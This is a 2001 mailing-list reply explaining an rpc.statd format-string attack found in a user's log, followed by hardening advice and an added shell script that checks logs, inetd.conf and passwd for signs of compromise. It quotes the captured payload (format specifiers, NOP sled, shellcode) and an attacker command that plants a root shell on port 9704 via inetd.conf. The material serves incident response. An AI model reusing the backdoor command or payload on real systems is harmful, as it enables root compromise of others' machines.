On Thu, 24 May 2001 [EMAIL PROTECTED] wrote:

What you have there is someone trying to do a buffer overflow attack on rpc.statd. The idea is that once the buffer is blown, they will get a chance to issue a command as root. In the attack that was attempted on one of the systems I was given to supervise, the last part of the garbage sent to the buffer was:

/bin/sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd
This, if it had succeeded, would have created a new line in inetd.conf and restarted inetd. Then they would have come in on port 9704 to a nice root shell and done whatever they wanted to do.... probably remove that line, edit my logs, install a root kit, and leave as quietly as possible. Luckily this time it didn't work and left some dirty footprints as evidence.

As stated earlier, the best way to deal with this, if you don't need rpc services running for NFS/NIS or something similar, is to just shut portmapper and all the other RPC services down and remove them from your start up scripts. I was curious however, so I just made sure tcp wrapper (tcpd) covered portmapper and added "portmap: ALL" to my /etc/hosts.deny file so I could gather some IP numbers via tcpd logging. Figure I should let the networks assigned the IPs know that some of their machines are compromised/being used for cracking.

While setting up a firewall as others have previously suggested is a dang good idea, don't forget to use tcp wrappers also, if only for the logging. For the security conscious, or the inexperienced, a good first step right after first booting a machine is to type su -c "echo ALL:ALL > /etc/hosts.deny" root . I'd do that before even connecting to the network. Later, if you must, you can relax it a bit, but it's a good place to start.

However, now that you have seen this one attack, you should probably go over your logs and system accounting files with a fine-tooth comb and see if anyone else might have succeeded before or after ;) This is a far from exhaustive list, but try:

- looking for any breaks in your log files or unexpected daemon restarts.
- examine your crontabs to see if there are any jobs you didn't put there.
- check your /etc/passwd file for any unrecognized users or strange shells.
- check inetd.conf for any odd entries.
- run a find / -mtime -x to look for new or edited files. See if there are any there that you don't remember editing. Look for changed permissions too.
- download a root kit detector and see if anyone has already left you a present.

Again, this is just the start ;) I apologize to folks who consider this all old news, but trevs was brave enough to admit he didn't know, so there are probably a few others lurking in the same boat ;)

Good luck!

David.

> Heya :)
>
> I was running a 'tail -f' on my /var/log/messages and this entry appeared while
> I was connected to the internet:
>
> May 24 10:08:11 noogies -- MARK --
> May 24 10:20:34 noogies
> May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for
> ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> May 24 10:20:34 noogies
> Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ
>
> and it has me worried it may be a security issue. I'm very new to linux, and
> newer again to debian, and at this stage I really don't have a clue as to what
> the above log entry is trying to tell me...
>
> Any input or comments would be very appreciated :)
>
> Thank you
>
> - trevs
>
> --
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
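The checklist David gives above (scan the logs for the rpc.statd garbage, look at inetd.conf and /etc/passwd for odd entries, find recently changed files) can be scripted. The script below is an added example and not code from either poster; it runs against constructed sample files written to a scratch directory, so the log lines, the inetd.conf and passwd contents, and the names SCRATCH, statd_attack_lines, suspect_inetd_entries, suspect_passwd_entries and recently_changed are all assumptions of the example. On a real box you would point the functions at /var/log/messages, /etc/inetd.conf, /etc/passwd and / instead.

```shell
#!/bin/sh
# Added example: post-incident triage for the rpc.statd attack in the thread.
# Sample inputs are constructed here, shortened and sanitized (the real log
# line carried a sled of roughly two hundred \220 bytes).
set -u

SCRATCH=$(mktemp -d)              # hypothetical scratch dir for the samples
trap 'rm -rf "$SCRATCH"' EXIT

cat > "$SCRATCH/messages" <<'EOF'
May 24 10:08:11 noogies -- MARK --
May 24 10:15:02 noogies /sbin/rpc.statd[151]: gethostbyname error for nohost.example.invalid
May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for ^X^W^Y%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220
May 24 10:20:35 noogies inetd[99]: re-reading configuration
EOF

cat > "$SCRATCH/inetd.conf" <<'EOF'
# /etc/inetd.conf (constructed sample)
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
9704 stream tcp nowait root /bin/sh sh -i
EOF

cat > "$SCRATCH/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
trevs:x:1000:1000:Trevs:/home/trevs:/bin/bash
toor:x:0:0::/:/bin/sh
EOF

# Lines logged by rpc.statd whose "hostname" carries %n conversions (the
# write primitive of a format-string payload), an octal-escaped run of
# 0x90 NOPs, or an embedded /bin/sh string. Exit status 1 when none match.
statd_attack_lines() {
    grep -E 'rpc\.statd\[[0-9]+\]: gethostbyname error for' "$1" |
        grep -E '%[0-9]*n|(\\220){4,}|/bin/sh'
}

# Non-comment inetd.conf entries (service sock proto wait user server args)
# whose service field is a bare port number, or which run a shell as root.
# The payload in the thread appends "9704 stream tcp nowait root /bin/sh sh -i".
suspect_inetd_entries() {
    awk '$1 !~ /^#/ && NF >= 6 &&
         ($1 ~ /^[0-9]+$/ || ($5 == "root" && $6 ~ /\/(ba)?sh$/))' "$1"
}

# Accounts other than root with uid 0, or with a shell outside a short
# allow-list (assumed here; on a real system compare with /etc/shells).
suspect_passwd_entries() {
    awk -F: '($3 == 0 && $1 != "root") ||
             ($7 != "/bin/sh" && $7 != "/bin/bash" && $7 != "/bin/false" &&
              $7 != "/usr/sbin/nologin")' "$1"
}

# Regular files under $1 modified within the last $2 days (David's find check).
recently_changed() {
    find "$1" -type f -mtime -"$2" 2>/dev/null
}

# Stand-alone run over the constructed samples.
echo "== rpc.statd payloads in log =="
statd_attack_lines "$SCRATCH/messages" || echo "(none)"
echo "== suspicious inetd.conf entries =="
suspect_inetd_entries "$SCRATCH/inetd.conf"
echo "== suspicious passwd entries =="
suspect_passwd_entries "$SCRATCH/passwd"
echo "== files changed in the last day under $SCRATCH =="
recently_changed "$SCRATCH" 1
```

The log check keys on the gethostbyname line, because that is where rpc.statd copies the attacker-supplied string; a plain failed lookup such as the nohost line is not flagged. The inetd.conf rule catches both halves of the backdoor entry in the thread, the numeric service name and a root shell as the server program, so a variant that only changes one of them still shows up.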